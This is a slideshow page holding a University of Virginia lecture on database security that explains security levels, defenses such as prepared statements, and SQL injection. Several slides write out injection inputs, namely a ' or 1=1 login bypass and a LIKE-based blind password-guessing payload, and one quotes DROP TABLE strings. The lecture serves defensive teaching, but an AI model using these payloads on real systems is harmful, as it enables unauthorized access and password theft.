database
play

DATABASE SECURITY CS4750 Database Systems Prof. Nada Basit Email: - PowerPoint PPT Presentation

Jan 18, 2024 •199 likes •380 views

DATABASE SECURITY CS4750 Database Systems Prof. Nada Basit Email: basit@virginia.edu Fall 2020 University of Virginia 1 Levels of DB Security There are 6 levels that impact database security Database Level database users and

  1. DATABASE SECURITY CS4750 – Database Systems Prof. Nada Basit Email: basit@virginia.edu Fall 2020 University of Virginia 1

  2. Levels of DB Security  There are 6 levels that impact database security  Database Level – database users and authorization  Application Level – information management and processing  Operating System Level – data storage and protection  Network Level – data transmission  Physical Level – computer equipment protection  Human Level – social engineering protection Security is important not only at the database level, but the entire database application. Breaches can happen at any of these levels. 2

  3. Application Level 3

  4. Application Level  Write programs with security in mind from the beginning!  Guard against SQL injection attacks !  Use prepared statements  Strong typing of applications to prevent type errors!  Expect back a particular type (nothing else)  Catch and handle all errors!  Encrypt data when possible! Don’t use open channels through the application!  Programmer/developer accessing code securely: SSH 4

  5. SQL INJECTION ATTACK VIDEOS 5 This Photo by Unknown Author is licensed under CC BY

  6. SQL Injection Attack  Given a SQL query where some portion is blank and left for us to fill in, we attempt to fill in the query with a string that:  Matches the correct format  Also contains some extra commands to get data that we should not be allowed to see 6

  7. Classic SQL Injection  Consider the following SQL query: SELECT * FROM Users WHERE Username='$username' AND Password='$password'  Such a query is typically used from a web application in order to authenticate a user  If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to login to the system, otherwise access is denied  The values of the input fields are generally obtained from the user through a web form / login screen 7 https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

  8. Classic SQL Injection  Let’s use the same SQL query: SELECT * FROM Users WHERE Username='$username' AND Password='$password'  What happens if we insert the following Username and Password values: $username = 1’ or ‘1’ = ‘1 $password = 1’ or ‘1’ = ‘1  The query will be: SELECT * FROM Users WHERE Username=‘ 1' OR '1'='1' AND Password='1' OR '1'='1'  The query returns a value (or a set of values) because the condition is always true (OR 1=1). In this way the system has authenticated the user without knowing the username and password! 8

  9. SQL Injection Attacks  Using this attack strategy, if not using a prepared statement (for instance) it means …  You can type in what ever you want including SQL – this is how SQL injection attacks happen  E.g. for UN type in something, for password type in ‘ or 1=1  The ‘ closes quote (blank string) How often is 1=1? Always true!  Can then be creative afterwards using nested SQL query 9

  10. Simple attack: guessing the password (brute force… but if you got the time…!) SELECT username FROM UsersTbl WHERE username='' AND password=''  The idea is to execute an SQL injection attack that will tell you something about the actual password  If you construct a statement that is TRUE, the system will log you in  So ask questions that have a TRUE or FALSE response  Slowly build up to the information that you need! (Hint: use LIKE )  Use LIKE to compare a guess for the password with the actual password. Using regex/pattern matching symbol ‘ % ’ we build a query that tacks on a password comparison in the username field ...WHERE username='admin' AND password LIKE 'a%' #' AND password='...'  Type this in both the username and password fields. (# = a comment) 10

  11. Simple attack: guessing the password (brute force… but if you got the time…!) SELECT username FROM UsersTbl WHERE username='' AND password=''  Use LIKE to compare a guess for the password with the actual password. Using regex/pattern matching symbol ‘ % ’ we build a query that tacks on a password comparison in the username field ...WHERE username='admin' AND password LIKE 'a%' #' AND password='...'  Type this in both the username and password fields. (# = a comment)  Let’s assume we know the username is admin , when we submit this, the query checks if the username is admin and if the additional password comparison is true  The query ends and the original password check NEVER executes since it is commented out! (# = a comment)  After injecting this, we see this results in “ Incorrect username or password ”. So we keep trying different characters until we have successfully logged in. If we’re logged in, we know the question is true!  (Remember, % matches 0 or more characters, if you wanted to match one character use _ ) For example: ‘_c%’ checks if the 2 nd character is a “c” 11

  12. SQL Injection Attack Tool: Get Password Activity http://databases.cs.virginia.edu /sqlinject/activity/activity.php Tool developed by Dr. Nada Basit, Joseph Chen, Alexander Sun, Rohan Koduri, and Vamshi Garikapati 12

  13. SQL Injection Attack Examples  SQL injection is not new and has been used quite frequently to attack websites and companies  For a list of examples, see: https://en.wikipedia.org/wiki/SQL_injection#Examples 13

  14. https://en.wikipedia.org/wiki/SQL_injection#In_popular_culture In Popular Culture  Unauthorized login to web sites by means of SQL injection forms the basis of one of the subplots in J.K. Rowling 's novel The Casual Vacancy , published in 2012.  An xkcd cartoon involved a character Robert'); DROP TABLE students;- - named to carry out a SQL injection. As a result of this cartoon, SQL injection is sometimes informally referred to as 'Bobby Tables'.  In 2014, an individual in Poland legally renamed his business to Dariusz Jakubowski x'; DROP TABLE users; SELECT '1 in an attempt to disrupt operation of spammers’ harvesting bots .  Companies House , the UK's official register of companies, has a company named ; DROP TABLE "COMPANIES";-- LTD  The 2015 game Hacknet has a hacking program called SQL_MemCorrupt. It is described as injecting a table entry that causes a corruption error in a SQL database, then queries said table, causing a SQL database crash and core dump. 14

  15. http://www.xkcd.com/327/ ; https://beta.companieshouse.gov.uk/company/10542519 15

  16. SQL INJECTION USEFUL SITE REVIEW (FYI) 16 This Photo by Unknown Author is licensed under CC BY

  17. Question:  Which DB level is the cause of the most DB break-ins ?  Database Level  Application Level  Operating System Level  Network Level  Physical Level  Human Level  Did you have the chance to think about it? 17

  18. Human Level  What % of all DB break-ins do you think occur at level 6?  More than 90% happen at the Human level!  An estimated 70% of unauthorized access to information is committed by internal employees — who are also responsible for more than 95% of intrusions that result in significant financial losses!! 18

Recommend

Database Utilities 10/17/2007 DC/Win Database Utilities Opening Database Utilities From File on

Database Utilities 10/17/2007 DC/Win Database Utilities Opening Database Utilities From File on

Database Utilities 10/17/2007 DC/Win Database Utilities Opening Database Utilities From File on the Menu Bar DC/Win Database Utilities Options Vary Depending on Database Two Types of Databases Sequel (SQL) Database Access Database

460 views • 6 slides
Advanced Database CS 525: Organization? Advanced Database =Database Implementation

Advanced Database CS 525: Organization? Advanced Database =Database Implementation

Advanced Database CS 525: Organization? Advanced Database =Database Implementation Organization =How to implement a database system and have fun doing it ;-) 01: Introduction Boris Glavic Slides: adapted from a course taught by

199 views • 7 slides
DATABASE SYSTEMS Database programming in a web environment Database System Course AGENDA FOR

DATABASE SYSTEMS Database programming in a web environment Database System Course AGENDA FOR

DATABASE SYSTEMS Database programming in a web environment Database System Course AGENDA FOR TODAY The final project Advanced Mysql Database programming Recap: DB servers in the web Web programming architecture HTTP on a need-to-know basis.

688 views • 54 slides
NEBC Database Course 2008 Database Servers Database Interfaces Tim Booth : tbooth@ceh.ac.uk

NEBC Database Course 2008 Database Servers Database Interfaces Tim Booth : tbooth@ceh.ac.uk

NEBC Database Course 2008 Database Servers Database Interfaces Tim Booth : tbooth@ceh.ac.uk What is an RDBMS? A PostgreSQL database is not just kept in a big file, like a spreadsheet. A program called the database server, or RDBMS,

323 views • 14 slides
DATABASE SYSTEMS Database programming in a web environment Database System Course, 2016-2017

DATABASE SYSTEMS Database programming in a web environment Database System Course, 2016-2017

DATABASE SYSTEMS Database programming in a web environment Database System Course, 2016-2017 AGENDA FOR TODAY The final project Advanced Mysql Database programming Recap: DB servers in the web Web programming architecture HTTP on a

845 views • 53 slides
Goals Database Administration All large and small databases need database Database

Goals Database Administration All large and small databases need database Database

PHP Miscellaneous $db->insert_id IT420: Database Management and Retrieves the ID generated for an Organization AUTO_INCREMENT column by the previous INSERT query Return value: Managing Multi-user The ID generated for an

140 views • 11 slides
Lect ure # 11 ADVANCED DATABASE SYSTEMS System Catalogs and Database Compression @

Lect ure # 11 ADVANCED DATABASE SYSTEMS System Catalogs and Database Compression @

Lect ure # 11 ADVANCED DATABASE SYSTEMS System Catalogs and Database Compression @ Andy_Pavlo // 15- 721 // Spring 2018 DATABASE TALK Oracle In-Memory Database Engine Monday February 26 th @ 4:30pm GHC 4401

709 views • 60 slides
This Lecture General Database Security Privileges Database Security Granting

This Lecture General Database Security Privileges Database Security Granting

This Lecture General Database Security Privileges Database Security Granting Revoking Views Database Systems SQL Insertion Attacks Michael Pound Further Reading The Manga Guide to Databases, Chapter 5 Database

285 views • 7 slides
Your Database Experts PRESENTATION MAP 3. About our company 4. Nearshoring Database

Your Database Experts PRESENTATION MAP 3. About our company 4. Nearshoring Database

Your Database Experts PRESENTATION MAP 3. About our company 4. Nearshoring Database Consulting was founded in 2009 as an outsourcing and Oracle Database 5. Forms to APEX migration specialised education centre with in-house

850 views • 19 slides
National Address Database National Address Database What is a National Address Database?

National Address Database National Address Database What is a National Address Database?

White House Initiative Open Government Partnership National Action Plan National Address Database National Address Database What is a National Address Database? How does it work? Why do we need a National Address Database? What

374 views • 18 slides
Overview of Database Systems CS3860 - Jay Urbain, PhD Introduction to Database Systems 1 2 UFR

Overview of Database Systems CS3860 - Jay Urbain, PhD Introduction to Database Systems 1 2 UFR

Overview of Database Systems CS3860 - Jay Urbain, PhD Introduction to Database Systems 1 2 UFR Uniform Financial Report (I think) What is a database? 3 What is a database? Collection of data Files, notes, to do list, patient records,

1.13k views • 26 slides
Database Management Limitations of Relational Database Designs Systems Provides a set of

Database Management Limitations of Relational Database Designs Systems Provides a set of

Lecture 2 Database Management Limitations of Relational Database Designs Systems Provides a set of guidelines, does not result in a unique database schema Winter 2004 Does not provide a way of evaluating alternative schemas CMPUT

387 views • 17 slides
Database Design October 24, 2008 Database Design Outline Database Design E-R diagrams

Database Design October 24, 2008 Database Design Outline Database Design E-R diagrams

Database Design October 24, 2008 Database Design Outline Database Design E-R diagrams Represent logical structure simply, clearly Rectangles : entity sets Ellipses : attributes Diamonds : relationship sets Lines : linking elements Double

794 views • 54 slides
Introduction to Physical Database Design Elmasri/Navathe ch 16 and 17 Padron-McCarthy/Risch ch 21

Introduction to Physical Database Design Elmasri/Navathe ch 16 and 17 Padron-McCarthy/Risch ch 21

DATABASE DESIGN I - 1DL300 Fall 2010 An introductory course on database systems http://www.it.uu.se/edu/course/homepage/dbastekn/ht10/ Manivasakan Sabesan Uppsala Database Laboratory Department of Information Technology, Uppsala University,

372 views • 34 slides
A T T E S T A T T E S T A T T E S T Application (Java) Database 1 2 3 Database B C A E

A T T E S T A T T E S T A T T E S T Application (Java) Database 1 2 3 Database B C A E

A T T E S T A T T E S T A T T E S T Application (Java) Database 1 2 3 Database B C A E D F I G H J L M K O R N P S Q D2 D1 D3 D4 A T T E S T A T T E S T Testing Exposing externally visible internal stats /

485 views • 34 slides
Database APIs Elmasri/Navathe ch 12 Padron-McCarthy/Risch ch 20 Silvia Stefanova Department of

Database APIs Elmasri/Navathe ch 12 Padron-McCarthy/Risch ch 20 Silvia Stefanova Department of

DATABASE DESIGN I - 1DL300 Spring 2012 An Introductory Course on Database Systems http://www.it.uu.se/edu/course/homepage/dbastekn/vt12/ Erik Zeitler Uppsala Database Laboratory Department of Information Technology, Uppsala University,

515 views • 13 slides
Introduction to Database Technology Elmasri/Navathe ch 1-2 Padron-McCarthy/Risch ch 1 Sobhan

Introduction to Database Technology Elmasri/Navathe ch 1-2 Padron-McCarthy/Risch ch 1 Sobhan

DATABASE DESIGN I - 1DL300 Spring 2013 An Introductory Course on Database Systems http://www.it.uu.se/edu/course/homepage/dbastekn/vt13/ Uppsala Database Laboratory Department of Information Technology, Uppsala University, Uppsala, Sweden

728 views • 58 slides
Introduction to Database Technology Elmasri/Navathe ch 1-2 Padron-McCarthy/Risch ch 1 Sobhan

Introduction to Database Technology Elmasri/Navathe ch 1-2 Padron-McCarthy/Risch ch 1 Sobhan

DATABASE DESIGN I - 1DL300 Autumn 2012 An Introductory Course on Database Systems http://www.it.uu.se/edu/course/homepage/dbastekn/ht12/ Uppsala Database Laboratory Department of Information Technology, Uppsala University, Uppsala, Sweden

569 views • 9 slides
Database Programming in SQL/O RACLE The Database: M ONDIAL Continents Wolfgang May

Database Programming in SQL/O RACLE The Database: M ONDIAL Continents Wolfgang May

Database Programming in SQL/ORACLE Database Programming in SQL/O RACLE The Database: M ONDIAL Continents Wolfgang May Countries Mountains Economy Administrative Rivers Population Divisions Lakes Languages

992 views • 74 slides
Database Concepts 1 / 16 Database Concepts Data models, schemas, instances Three-schema

Database Concepts 1 / 16 Database Concepts Data models, schemas, instances Three-schema

Database Concepts 1 / 16 Database Concepts Data models, schemas, instances Three-schema architecture and data independence Database languages and interfaces Database systems DBMS Architectures Classification of DBMSes 2 /

570 views • 16 slides
Project # 1: Database Programming CSE462 Database Concepts Demian Lessa Department of Computer

Project # 1: Database Programming CSE462 Database Concepts Demian Lessa Department of Computer

Project # 1: Database Programming CSE462 Database Concepts Demian Lessa Department of Computer Science and Engineering State University of New York, Buffalo February 21, 2011 Outline Database Programming 1 Database Application Design 2

406 views • 29 slides
CSc 337 LECTURE 24: CREATING A DATABASE AND MORE JOINS Creating a database In the command line

CSc 337 LECTURE 24: CREATING A DATABASE AND MORE JOINS Creating a database In the command line

CSc 337 LECTURE 24: CREATING A DATABASE AND MORE JOINS Creating a database In the command line in mysql: CREATE DATABASE name ; To get to your database: USE name Creating a Database CREATE TABLE name ( columnName type constraints, ...

421 views • 13 slides
Todays lecture What is a database? Databases 1 Organisation and Understanding how

Todays lecture What is a database? Databases 1 Organisation and Understanding how

Todays lecture What is a database? Databases 1 Organisation and Understanding how data is organised in a database Creation Creating a database in Microsoft Access Lecture 14 COMPSCI111/111G S1 2019 What is a database?

427 views • 8 slides
Database Management System (DBMS) DBMS contains information about a particular enterprise

Database Management System (DBMS) DBMS contains information about a particular enterprise

Advanced Database System Architectures Advanced Topics in Database Management (INFSCI 2711) Textbook: Database System Concepts - 6 th Edition, 2010 Vladimir Zadorozhny, DINS, SCI University of Pittsburgh 1 Database Management System (DBMS) DBMS

545 views • 20 slides

More recommend